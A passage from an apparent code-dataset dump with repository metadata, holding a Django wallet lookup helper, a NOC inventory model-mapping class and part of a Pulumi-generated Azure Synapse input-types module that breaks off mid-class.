    sub_epochs: List[SubEpochData]
    sub_epoch_segments: List[SubEpochChallengeSegment]  # sampled sub epoch
    recent_chain_data: List[HeaderBlock]
| true | true |
f725e98002e1d4f074db4ac84131dc56e48d490e | 395 | py | Python | WalletSystem/walletApp/helpers.py | BakrFrag/Wallet-System | cc4a1114bc0811ef198ae5bc5689cb8696270e91 | [
"MIT"
] | null | null | null | WalletSystem/walletApp/helpers.py | BakrFrag/Wallet-System | cc4a1114bc0811ef198ae5bc5689cb8696270e91 | [
"MIT"
] | null | null | null | WalletSystem/walletApp/helpers.py | BakrFrag/Wallet-System | cc4a1114bc0811ef198ae5bc5689cb8696270e91 | [
"MIT"
] | null | null | null | from .models import Wallet;
from django.core.exceptions import ObjectDoesNotExist
def getWallet(phone_number):
    """
    Look up the Wallet registered under *phone_number*.

    Returns a dict with two keys:
      - "exists": True when a wallet with that phone number is found.
      - "wallet": the Wallet instance, or None when there is no match.
    """
    try:
        # phone is assumed unique per wallet, so get() is appropriate here.
        wallet = Wallet.objects.get(phone=phone_number)
    except Wallet.DoesNotExist:
        # No wallet registered under this phone number.
        return {"exists": False, "wallet": None}
    return {"exists": True, "wallet": wallet}
from django.core.exceptions import ObjectDoesNotExist
def getWallet(phone_number):
    """Return {"exists": bool, "wallet": Wallet | None} for *phone_number*."""
    try:
        walletobj=Wallet.objects.get(phone=phone_number);
        return {"exists":True,"wallet":walletobj}
    except Wallet.DoesNotExist as E:
        # No wallet registered under this phone number.
        return {"exists":False,"wallet":None};
f725e992c7f42887faa027f5696991c0ea53be19 | 1,092 | py | Python | inv/models/modelmapping.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | inv/models/modelmapping.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | inv/models/modelmapping.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# ModelMapping model
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Third-party modules
from mongoengine.document import Document
from mongoengine.fields import StringField, BooleanField
# NOC modules
from noc.inv.models.objectmodel import ObjectModel
from noc.core.mongo.fields import PlainReferenceField
class ModelMapping(Document):
    """Maps vendor/part-number data reported by inventory to an ObjectModel,
    optionally narrowed to a serial-number range."""
    meta = {"collection": "noc.modelmappings", "strict": False, "auto_create_index": False}
    # Vendor, as returned by get_inventory
    vendor = StringField()
    # Part number, as returned by get_inventory
    part_no = StringField()
    # Serial number ranges, if applicable
    from_serial = StringField()
    to_serial = StringField()
    # Object model this mapping resolves to
    model = PlainReferenceField(ObjectModel)
    # NOTE(review): inactive mappings are presumably skipped during lookup —
    # confirm at the call sites.
    is_active = BooleanField(default=True)
    description = StringField(required=False)
| 33.090909 | 91 | 0.591575 |
from mongoengine.document import Document
from mongoengine.fields import StringField, BooleanField
from noc.inv.models.objectmodel import ObjectModel
from noc.core.mongo.fields import PlainReferenceField
class ModelMapping(Document):
    """Maps vendor/part-number data reported by inventory to an ObjectModel,
    optionally narrowed to a serial-number range."""
    meta = {"collection": "noc.modelmappings", "strict": False, "auto_create_index": False}
    # Vendor, as returned by get_inventory
    vendor = StringField()
    # Part number, as returned by get_inventory
    part_no = StringField()
    # Serial number range, if applicable
    from_serial = StringField()
    to_serial = StringField()
    # Object model this mapping resolves to
    model = PlainReferenceField(ObjectModel)
    is_active = BooleanField(default=True)
    description = StringField(required=False)
| true | true |
f725e9ad0a9d9b3dd8993d5832c9cd8a2351f823 | 78,589 | py | Python | sdk/python/pulumi_azure_native/synapse/v20190601preview/_inputs.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/synapse/v20190601preview/_inputs.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/synapse/v20190601preview/_inputs.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'AutoPausePropertiesArgs',
'AutoScalePropertiesArgs',
'CmdkeySetupArgs',
'ComponentSetupArgs',
'CustomerManagedKeyDetailsArgs',
'DataLakeStorageAccountDetailsArgs',
'DynamicExecutorAllocationArgs',
'EncryptionDetailsArgs',
'EntityReferenceArgs',
'EnvironmentVariableSetupArgs',
'GitHubClientSecretArgs',
'IntegrationRuntimeComputePropertiesArgs',
'IntegrationRuntimeCustomSetupScriptPropertiesArgs',
'IntegrationRuntimeDataFlowPropertiesArgs',
'IntegrationRuntimeDataProxyPropertiesArgs',
'IntegrationRuntimeSsisCatalogInfoArgs',
'IntegrationRuntimeSsisPropertiesArgs',
'IntegrationRuntimeVNetPropertiesArgs',
'LibraryInfoArgs',
'LibraryRequirementsArgs',
'LinkedIntegrationRuntimeKeyAuthorizationArgs',
'LinkedIntegrationRuntimeRbacAuthorizationArgs',
'ManagedIdentityArgs',
'ManagedIntegrationRuntimeArgs',
'ManagedVirtualNetworkReferenceArgs',
'ManagedVirtualNetworkSettingsArgs',
'PrivateEndpointConnectionArgs',
'PrivateLinkServiceConnectionStateArgs',
'PurviewConfigurationArgs',
'SecureStringArgs',
'SelfHostedIntegrationRuntimeArgs',
'SkuArgs',
'SqlPoolVulnerabilityAssessmentRuleBaselineItemArgs',
'VirtualNetworkProfileArgs',
'VulnerabilityAssessmentRecurringScansPropertiesArgs',
'WorkspaceKeyDetailsArgs',
'WorkspaceRepositoryConfigurationArgs',
]
@pulumi.input_type
class AutoPausePropertiesArgs:
    """Auto-pausing properties of a Big Data pool powered by Apache Spark."""
    def __init__(__self__, *,
                 delay_in_minutes: Optional[pulumi.Input[int]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Auto-pausing properties of a Big Data pool powered by Apache Spark
        :param pulumi.Input[int] delay_in_minutes: Number of minutes of idle time before the Big Data pool is automatically paused.
        :param pulumi.Input[bool] enabled: Whether auto-pausing is enabled for the Big Data pool.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if delay_in_minutes is not None:
            pulumi.set(__self__, "delay_in_minutes", delay_in_minutes)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
    @property
    @pulumi.getter(name="delayInMinutes")
    def delay_in_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        Number of minutes of idle time before the Big Data pool is automatically paused.
        """
        return pulumi.get(self, "delay_in_minutes")
    @delay_in_minutes.setter
    def delay_in_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "delay_in_minutes", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether auto-pausing is enabled for the Big Data pool.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class AutoScalePropertiesArgs:
    """Auto-scaling properties of a Big Data pool powered by Apache Spark."""
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 max_node_count: Optional[pulumi.Input[int]] = None,
                 min_node_count: Optional[pulumi.Input[int]] = None):
        """
        Auto-scaling properties of a Big Data pool powered by Apache Spark
        :param pulumi.Input[bool] enabled: Whether automatic scaling is enabled for the Big Data pool.
        :param pulumi.Input[int] max_node_count: The maximum number of nodes the Big Data pool can support.
        :param pulumi.Input[int] min_node_count: The minimum number of nodes the Big Data pool can support.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if max_node_count is not None:
            pulumi.set(__self__, "max_node_count", max_node_count)
        if min_node_count is not None:
            pulumi.set(__self__, "min_node_count", min_node_count)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether automatic scaling is enabled for the Big Data pool.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="maxNodeCount")
    def max_node_count(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum number of nodes the Big Data pool can support.
        """
        return pulumi.get(self, "max_node_count")
    @max_node_count.setter
    def max_node_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_node_count", value)
    @property
    @pulumi.getter(name="minNodeCount")
    def min_node_count(self) -> Optional[pulumi.Input[int]]:
        """
        The minimum number of nodes the Big Data pool can support.
        """
        return pulumi.get(self, "min_node_count")
    @min_node_count.setter
    def min_node_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_node_count", value)
@pulumi.input_type
class CmdkeySetupArgs:
    """The custom setup of running cmdkey commands."""
    def __init__(__self__, *,
                 password: pulumi.Input['SecureStringArgs'],
                 target_name: Any,
                 type: pulumi.Input[str],
                 user_name: Any):
        """
        The custom setup of running cmdkey commands.
        :param pulumi.Input['SecureStringArgs'] password: The password of data source access.
        :param Any target_name: The server name of data source access.
        :param pulumi.Input[str] type: The type of custom setup.
               Expected value is 'CmdkeySetup'.
        :param Any user_name: The user name of data source access.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "target_name", target_name)
        # Discriminator is pinned to 'CmdkeySetup' regardless of the `type` argument.
        pulumi.set(__self__, "type", 'CmdkeySetup')
        pulumi.set(__self__, "user_name", user_name)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input['SecureStringArgs']:
        """
        The password of data source access.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input['SecureStringArgs']):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter(name="targetName")
    def target_name(self) -> Any:
        """
        The server name of data source access.
        """
        return pulumi.get(self, "target_name")
    @target_name.setter
    def target_name(self, value: Any):
        pulumi.set(self, "target_name", value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The type of custom setup.
        Expected value is 'CmdkeySetup'.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="userName")
    def user_name(self) -> Any:
        """
        The user name of data source access.
        """
        return pulumi.get(self, "user_name")
    @user_name.setter
    def user_name(self, value: Any):
        pulumi.set(self, "user_name", value)
@pulumi.input_type
class ComponentSetupArgs:
    """The custom setup of installing 3rd party components."""
    def __init__(__self__, *,
                 component_name: pulumi.Input[str],
                 type: pulumi.Input[str],
                 license_key: Optional[pulumi.Input['SecureStringArgs']] = None):
        """
        The custom setup of installing 3rd party components.
        :param pulumi.Input[str] component_name: The name of the 3rd party component.
        :param pulumi.Input[str] type: The type of custom setup.
               Expected value is 'ComponentSetup'.
        :param pulumi.Input['SecureStringArgs'] license_key: The license key to activate the component.
        """
        pulumi.set(__self__, "component_name", component_name)
        # Discriminator is pinned to 'ComponentSetup' regardless of the `type` argument.
        pulumi.set(__self__, "type", 'ComponentSetup')
        if license_key is not None:
            pulumi.set(__self__, "license_key", license_key)
    @property
    @pulumi.getter(name="componentName")
    def component_name(self) -> pulumi.Input[str]:
        """
        The name of the 3rd party component.
        """
        return pulumi.get(self, "component_name")
    @component_name.setter
    def component_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "component_name", value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The type of custom setup.
        Expected value is 'ComponentSetup'.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="licenseKey")
    def license_key(self) -> Optional[pulumi.Input['SecureStringArgs']]:
        """
        The license key to activate the component.
        """
        return pulumi.get(self, "license_key")
    @license_key.setter
    def license_key(self, value: Optional[pulumi.Input['SecureStringArgs']]):
        pulumi.set(self, "license_key", value)
@pulumi.input_type
class CustomerManagedKeyDetailsArgs:
    """Details of the customer managed key associated with the workspace."""
    def __init__(__self__, *,
                 key: Optional[pulumi.Input['WorkspaceKeyDetailsArgs']] = None):
        """
        Details of the customer managed key associated with the workspace
        :param pulumi.Input['WorkspaceKeyDetailsArgs'] key: The key object of the workspace
        """
        # Only explicitly-provided (non-None) values are recorded.
        if key is not None:
            pulumi.set(__self__, "key", key)
    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input['WorkspaceKeyDetailsArgs']]:
        """
        The key object of the workspace
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: Optional[pulumi.Input['WorkspaceKeyDetailsArgs']]):
        pulumi.set(self, "key", value)
@pulumi.input_type
class DataLakeStorageAccountDetailsArgs:
    """Details of the data lake storage account associated with the workspace."""
    def __init__(__self__, *,
                 account_url: Optional[pulumi.Input[str]] = None,
                 filesystem: Optional[pulumi.Input[str]] = None):
        """
        Details of the data lake storage account associated with the workspace
        :param pulumi.Input[str] account_url: Account URL
        :param pulumi.Input[str] filesystem: Filesystem name
        """
        # Only explicitly-provided (non-None) values are recorded.
        if account_url is not None:
            pulumi.set(__self__, "account_url", account_url)
        if filesystem is not None:
            pulumi.set(__self__, "filesystem", filesystem)
    @property
    @pulumi.getter(name="accountUrl")
    def account_url(self) -> Optional[pulumi.Input[str]]:
        """
        Account URL
        """
        return pulumi.get(self, "account_url")
    @account_url.setter
    def account_url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "account_url", value)
    @property
    @pulumi.getter
    def filesystem(self) -> Optional[pulumi.Input[str]]:
        """
        Filesystem name
        """
        return pulumi.get(self, "filesystem")
    @filesystem.setter
    def filesystem(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "filesystem", value)
@pulumi.input_type
class DynamicExecutorAllocationArgs:
    """Dynamic Executor Allocation properties."""
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Dynamic Executor Allocation Properties
        :param pulumi.Input[bool] enabled: Indicates whether Dynamic Executor Allocation is enabled or not.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates whether Dynamic Executor Allocation is enabled or not.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class EncryptionDetailsArgs:
    """Details of the encryption associated with the workspace."""
    def __init__(__self__, *,
                 cmk: Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']] = None):
        """
        Details of the encryption associated with the workspace
        :param pulumi.Input['CustomerManagedKeyDetailsArgs'] cmk: Customer Managed Key Details
        """
        # Only explicitly-provided (non-None) values are recorded.
        if cmk is not None:
            pulumi.set(__self__, "cmk", cmk)
    @property
    @pulumi.getter
    def cmk(self) -> Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']]:
        """
        Customer Managed Key Details
        """
        return pulumi.get(self, "cmk")
    @cmk.setter
    def cmk(self, value: Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']]):
        pulumi.set(self, "cmk", value)
@pulumi.input_type
class EntityReferenceArgs:
    """The entity reference."""
    def __init__(__self__, *,
                 reference_name: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]] = None):
        """
        The entity reference.
        :param pulumi.Input[str] reference_name: The name of this referenced entity.
        :param pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']] type: The type of this referenced entity.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if reference_name is not None:
            pulumi.set(__self__, "reference_name", reference_name)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="referenceName")
    def reference_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of this referenced entity.
        """
        return pulumi.get(self, "reference_name")
    @reference_name.setter
    def reference_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reference_name", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]]:
        """
        The type of this referenced entity.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class EnvironmentVariableSetupArgs:
    """The custom setup of setting an environment variable."""
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 variable_name: pulumi.Input[str],
                 variable_value: pulumi.Input[str]):
        """
        The custom setup of setting environment variable.
        :param pulumi.Input[str] type: The type of custom setup.
               Expected value is 'EnvironmentVariableSetup'.
        :param pulumi.Input[str] variable_name: The name of the environment variable.
        :param pulumi.Input[str] variable_value: The value of the environment variable.
        """
        # Discriminator is pinned to 'EnvironmentVariableSetup' regardless of the `type` argument.
        pulumi.set(__self__, "type", 'EnvironmentVariableSetup')
        pulumi.set(__self__, "variable_name", variable_name)
        pulumi.set(__self__, "variable_value", variable_value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The type of custom setup.
        Expected value is 'EnvironmentVariableSetup'.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="variableName")
    def variable_name(self) -> pulumi.Input[str]:
        """
        The name of the environment variable.
        """
        return pulumi.get(self, "variable_name")
    @variable_name.setter
    def variable_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "variable_name", value)
    @property
    @pulumi.getter(name="variableValue")
    def variable_value(self) -> pulumi.Input[str]:
        """
        The value of the environment variable.
        """
        return pulumi.get(self, "variable_value")
    @variable_value.setter
    def variable_value(self, value: pulumi.Input[str]):
        pulumi.set(self, "variable_value", value)
@pulumi.input_type
class GitHubClientSecretArgs:
    """Client secret information for the factory's bring-your-own-app repository configuration."""
    def __init__(__self__, *,
                 byoa_secret_akv_url: Optional[pulumi.Input[str]] = None,
                 byoa_secret_name: Optional[pulumi.Input[str]] = None):
        """
        Client secret information for factory's bring your own app repository configuration
        :param pulumi.Input[str] byoa_secret_akv_url: Bring your own app client secret AKV URL
        :param pulumi.Input[str] byoa_secret_name: Bring your own app client secret name in AKV
        """
        # Only explicitly-provided (non-None) values are recorded.
        if byoa_secret_akv_url is not None:
            pulumi.set(__self__, "byoa_secret_akv_url", byoa_secret_akv_url)
        if byoa_secret_name is not None:
            pulumi.set(__self__, "byoa_secret_name", byoa_secret_name)
    @property
    @pulumi.getter(name="byoaSecretAkvUrl")
    def byoa_secret_akv_url(self) -> Optional[pulumi.Input[str]]:
        """
        Bring your own app client secret AKV URL
        """
        return pulumi.get(self, "byoa_secret_akv_url")
    @byoa_secret_akv_url.setter
    def byoa_secret_akv_url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "byoa_secret_akv_url", value)
    @property
    @pulumi.getter(name="byoaSecretName")
    def byoa_secret_name(self) -> Optional[pulumi.Input[str]]:
        """
        Bring your own app client secret name in AKV
        """
        return pulumi.get(self, "byoa_secret_name")
    @byoa_secret_name.setter
    def byoa_secret_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "byoa_secret_name", value)
@pulumi.input_type
class IntegrationRuntimeComputePropertiesArgs:
    """The compute resource properties for a managed integration runtime."""
    def __init__(__self__, *,
                 data_flow_properties: Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 max_parallel_executions_per_node: Optional[pulumi.Input[int]] = None,
                 node_size: Optional[pulumi.Input[str]] = None,
                 number_of_nodes: Optional[pulumi.Input[int]] = None,
                 v_net_properties: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']] = None):
        """
        The compute resource properties for managed integration runtime.
        :param pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs'] data_flow_properties: Data flow properties for managed integration runtime.
        :param pulumi.Input[str] location: The location for managed integration runtime. The supported regions could be found on https://docs.microsoft.com/en-us/azure/data-factory/data-factory-data-movement-activities
        :param pulumi.Input[int] max_parallel_executions_per_node: Maximum parallel executions count per node for managed integration runtime.
        :param pulumi.Input[str] node_size: The node size requirement to managed integration runtime.
        :param pulumi.Input[int] number_of_nodes: The required number of nodes for managed integration runtime.
        :param pulumi.Input['IntegrationRuntimeVNetPropertiesArgs'] v_net_properties: VNet properties for managed integration runtime.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if data_flow_properties is not None:
            pulumi.set(__self__, "data_flow_properties", data_flow_properties)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if max_parallel_executions_per_node is not None:
            pulumi.set(__self__, "max_parallel_executions_per_node", max_parallel_executions_per_node)
        if node_size is not None:
            pulumi.set(__self__, "node_size", node_size)
        if number_of_nodes is not None:
            pulumi.set(__self__, "number_of_nodes", number_of_nodes)
        if v_net_properties is not None:
            pulumi.set(__self__, "v_net_properties", v_net_properties)
    @property
    @pulumi.getter(name="dataFlowProperties")
    def data_flow_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']]:
        """
        Data flow properties for managed integration runtime.
        """
        return pulumi.get(self, "data_flow_properties")
    @data_flow_properties.setter
    def data_flow_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']]):
        pulumi.set(self, "data_flow_properties", value)
    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        The location for managed integration runtime. The supported regions could be found on https://docs.microsoft.com/en-us/azure/data-factory/data-factory-data-movement-activities
        """
        return pulumi.get(self, "location")
    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)
    @property
    @pulumi.getter(name="maxParallelExecutionsPerNode")
    def max_parallel_executions_per_node(self) -> Optional[pulumi.Input[int]]:
        """
        Maximum parallel executions count per node for managed integration runtime.
        """
        return pulumi.get(self, "max_parallel_executions_per_node")
    @max_parallel_executions_per_node.setter
    def max_parallel_executions_per_node(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_parallel_executions_per_node", value)
    @property
    @pulumi.getter(name="nodeSize")
    def node_size(self) -> Optional[pulumi.Input[str]]:
        """
        The node size requirement to managed integration runtime.
        """
        return pulumi.get(self, "node_size")
    @node_size.setter
    def node_size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "node_size", value)
    @property
    @pulumi.getter(name="numberOfNodes")
    def number_of_nodes(self) -> Optional[pulumi.Input[int]]:
        """
        The required number of nodes for managed integration runtime.
        """
        return pulumi.get(self, "number_of_nodes")
    @number_of_nodes.setter
    def number_of_nodes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "number_of_nodes", value)
    @property
    @pulumi.getter(name="vNetProperties")
    def v_net_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]:
        """
        VNet properties for managed integration runtime.
        """
        return pulumi.get(self, "v_net_properties")
    @v_net_properties.setter
    def v_net_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]):
        pulumi.set(self, "v_net_properties", value)
@pulumi.input_type
class IntegrationRuntimeCustomSetupScriptPropertiesArgs:
    """Custom setup script properties for a managed dedicated integration runtime."""
    def __init__(__self__, *,
                 blob_container_uri: Optional[pulumi.Input[str]] = None,
                 sas_token: Optional[pulumi.Input['SecureStringArgs']] = None):
        """
        Custom setup script properties for a managed dedicated integration runtime.
        :param pulumi.Input[str] blob_container_uri: The URI of the Azure blob container that contains the custom setup script.
        :param pulumi.Input['SecureStringArgs'] sas_token: The SAS token of the Azure blob container.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if blob_container_uri is not None:
            pulumi.set(__self__, "blob_container_uri", blob_container_uri)
        if sas_token is not None:
            pulumi.set(__self__, "sas_token", sas_token)
    @property
    @pulumi.getter(name="blobContainerUri")
    def blob_container_uri(self) -> Optional[pulumi.Input[str]]:
        """
        The URI of the Azure blob container that contains the custom setup script.
        """
        return pulumi.get(self, "blob_container_uri")
    @blob_container_uri.setter
    def blob_container_uri(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "blob_container_uri", value)
    @property
    @pulumi.getter(name="sasToken")
    def sas_token(self) -> Optional[pulumi.Input['SecureStringArgs']]:
        """
        The SAS token of the Azure blob container.
        """
        return pulumi.get(self, "sas_token")
    @sas_token.setter
    def sas_token(self, value: Optional[pulumi.Input['SecureStringArgs']]):
        pulumi.set(self, "sas_token", value)
@pulumi.input_type
class IntegrationRuntimeDataFlowPropertiesArgs:
    """Data flow properties for a managed integration runtime."""
    def __init__(__self__, *,
                 cleanup: Optional[pulumi.Input[bool]] = None,
                 compute_type: Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]] = None,
                 core_count: Optional[pulumi.Input[int]] = None,
                 time_to_live: Optional[pulumi.Input[int]] = None):
        """
        Data flow properties for managed integration runtime.
        :param pulumi.Input[bool] cleanup: Cluster will not be recycled and it will be used in next data flow activity run until TTL (time to live) is reached if this is set as false. Default is true.
        :param pulumi.Input[Union[str, 'DataFlowComputeType']] compute_type: Compute type of the cluster which will execute data flow job.
        :param pulumi.Input[int] core_count: Core count of the cluster which will execute data flow job. Supported values are: 8, 16, 32, 48, 80, 144 and 272.
        :param pulumi.Input[int] time_to_live: Time to live (in minutes) setting of the cluster which will execute data flow job.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if cleanup is not None:
            pulumi.set(__self__, "cleanup", cleanup)
        if compute_type is not None:
            pulumi.set(__self__, "compute_type", compute_type)
        if core_count is not None:
            pulumi.set(__self__, "core_count", core_count)
        if time_to_live is not None:
            pulumi.set(__self__, "time_to_live", time_to_live)
    @property
    @pulumi.getter
    def cleanup(self) -> Optional[pulumi.Input[bool]]:
        """
        Cluster will not be recycled and it will be used in next data flow activity run until TTL (time to live) is reached if this is set as false. Default is true.
        """
        return pulumi.get(self, "cleanup")
    @cleanup.setter
    def cleanup(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "cleanup", value)
    @property
    @pulumi.getter(name="computeType")
    def compute_type(self) -> Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]]:
        """
        Compute type of the cluster which will execute data flow job.
        """
        return pulumi.get(self, "compute_type")
    @compute_type.setter
    def compute_type(self, value: Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]]):
        pulumi.set(self, "compute_type", value)
    @property
    @pulumi.getter(name="coreCount")
    def core_count(self) -> Optional[pulumi.Input[int]]:
        """
        Core count of the cluster which will execute data flow job. Supported values are: 8, 16, 32, 48, 80, 144 and 272.
        """
        return pulumi.get(self, "core_count")
    @core_count.setter
    def core_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "core_count", value)
    @property
    @pulumi.getter(name="timeToLive")
    def time_to_live(self) -> Optional[pulumi.Input[int]]:
        """
        Time to live (in minutes) setting of the cluster which will execute data flow job.
        """
        return pulumi.get(self, "time_to_live")
    @time_to_live.setter
    def time_to_live(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "time_to_live", value)
@pulumi.input_type
class IntegrationRuntimeDataProxyPropertiesArgs:
    """Data proxy properties for a managed dedicated integration runtime."""
    def __init__(__self__, *,
                 connect_via: Optional[pulumi.Input['EntityReferenceArgs']] = None,
                 path: Optional[pulumi.Input[str]] = None,
                 staging_linked_service: Optional[pulumi.Input['EntityReferenceArgs']] = None):
        """
        Data proxy properties for a managed dedicated integration runtime.
        :param pulumi.Input['EntityReferenceArgs'] connect_via: The self-hosted integration runtime reference.
        :param pulumi.Input[str] path: The path to contain the staged data in the Blob storage.
        :param pulumi.Input['EntityReferenceArgs'] staging_linked_service: The staging linked service reference.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if connect_via is not None:
            pulumi.set(__self__, "connect_via", connect_via)
        if path is not None:
            pulumi.set(__self__, "path", path)
        if staging_linked_service is not None:
            pulumi.set(__self__, "staging_linked_service", staging_linked_service)
    @property
    @pulumi.getter(name="connectVia")
    def connect_via(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
        """
        The self-hosted integration runtime reference.
        """
        return pulumi.get(self, "connect_via")
    @connect_via.setter
    def connect_via(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
        pulumi.set(self, "connect_via", value)
    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        """
        The path to contain the staged data in the Blob storage.
        """
        return pulumi.get(self, "path")
    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path", value)
    @property
    @pulumi.getter(name="stagingLinkedService")
    def staging_linked_service(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
        """
        The staging linked service reference.
        """
        return pulumi.get(self, "staging_linked_service")
    @staging_linked_service.setter
    def staging_linked_service(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
        pulumi.set(self, "staging_linked_service", value)
@pulumi.input_type
class IntegrationRuntimeSsisCatalogInfoArgs:
    """Catalog information for a managed dedicated integration runtime."""
    def __init__(__self__, *,
                 catalog_admin_password: Optional[pulumi.Input['SecureStringArgs']] = None,
